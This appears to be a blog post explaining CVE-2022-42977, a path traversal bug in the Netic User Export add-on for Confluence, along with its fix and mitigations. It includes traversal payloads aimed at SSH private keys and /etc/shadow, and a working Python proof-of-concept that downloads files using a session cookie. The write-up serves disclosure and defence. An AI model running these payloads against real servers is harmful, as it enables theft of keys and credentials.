CVE-2022-42977 - How a Simple Export Feature in Netic User Export Let Attackers Download Any File from Atlassian Confluence

Confluence is one of the most widely-used platforms for team collaboration, and add-ons are often required for various business needs. But sometimes, these add-ons accidentally open dangerous holes—exactly like what happened with the Netic User Export add-on before version 1.3.5. This post gives you a deep dive into this vulnerability (CVE-2022-42977), showing how a small parameter in a user export feature allowed attackers to download any file on the server—even private SSH keys.

What is the Netic User Export Add-on?

The Netic User Export plug-in lets Confluence admins export user lists for backup, migrations, or compliance. It does this by letting you generate download files—usually CSVs or Excel spreadsheets—containing usernames, emails, and other details.

Like many export tools, you can give your exported file a custom name. This is where things went disastrously wrong.

The Vulnerability: Unvalidated fileName Parameter

The add-on provided an export feature, but failed to validate the desired output filename specified in the HTTP request. Instead of only exporting to, say, users-export.csv, the add-on trusted whatever filename came from the HTTP request.

How Did It Work?

When sending an export request, the client could specify a fileName parameter. But instead of limiting this parameter to safe, known filenames in a specific directory, the add-on simply opened and served the file as requested. This meant an attacker could change the fileName to reference _any_ file on the Confluence server.

Suppose the plugin's export endpoint was something like

POST /plugins/servlet/netic-user-export/export
Content-Type: application/x-www-form-urlencoded

fileName=users.csv

A normal user gets a file called users.csv, containing the user list.

But an attacker could do

POST /plugins/servlet/netic-user-export/export
Content-Type: application/x-www-form-urlencoded

fileName=../../../../../../home/confluence/.ssh/id_rsa

Or on Windows

fileName=C:\Users\confluence\.ssh\id_rsa

The export feature would see that fileName, open it, and send back the raw file—no questions asked. This could include:

Private SSH keys

- Password files like /etc/passwd or /etc/shadow

Simple Proof-of-Concept (PoC) Code

Here's a Python snippet showing how to exploit this, given a Confluence server using a vulnerable Netic User Export add-on:

import requests

url = 'https://confluence.example.com/plugins/servlet/netic-user-export/export';
data = {
    'fileName': '../../../../../../home/confluence/.ssh/id_rsa'
}
cookies = {'JSESSIONID': 'YOUR_SESSION_ID'}  # Needs a valid session

response = requests.post(url, data=data, cookies=cookies)

if response.status_code == 200:
    with open('id_rsa', 'wb') as f:
        f.write(response.content)
    print('[+] File downloaded: id_rsa')
else:
    print('[-] Exploit failed:', response.status_code)

You need to be authenticated, but if an attacker can log in as any user, they're in.

Application: Any Confluence setup running the vulnerable version

- Risk: Confidential files accessible to any authenticated user (and in some misconfigs, even anonymous users)

Why is This So Dangerous?

This is a classic case of arbitrary file download. If attackers can download any file accessible to the Confluence server’s OS user, it doesn't matter if your core app is up-to-date and secure.

Worst case? Stealing private keys or database credentials, then using them for full server takeover.

Official References

- CVE-2022-42977 on NVD
- Atlassian Marketplace - Netic User Export
- Vendor Advisory (if available)

How Was It Fixed?

Version 1.3.5 of the add-on fixed this by adding proper validation and restricting exports to only allowed filenames and directories. If you’re running a version before 1.3.5: update right now.

How To Protect Your Confluence (and all add-ons)

- Audit all export/download features: Look for fileName, path, or similar parameters in any admin or user tool.
- Apply principle of least privilege: The OS user running Confluence should have access only to what's needed.

Patch add-ons promptly: Not just Confluence itself.

- Monitor logs for weird export requests, especially those requesting files outside the intended export directory.

Conclusion

CVE-2022-42977 is a reminder that even simple features like exports can pose huge risks. Always validate parameters, limit file access, and don’t trust user input—even from admins.

If you're maintaining Atlassian Confluence or any similar software, put add-ons through the same scrutiny you apply to core updates. One slip-up, as we saw here, could put your whole server at risk.

References

- CVE-2022-42977 NVD Entry
- Netic User Export on Atlassian Marketplace
- Netic User Export Version History


If this post helped you understand CVE-2022-42977 better, share it with your IT security team or software admin friends!

Timeline

Published on: 11/15/2022 01:15:00 UTC
Last modified on: 08/08/2023 14:22:00 UTC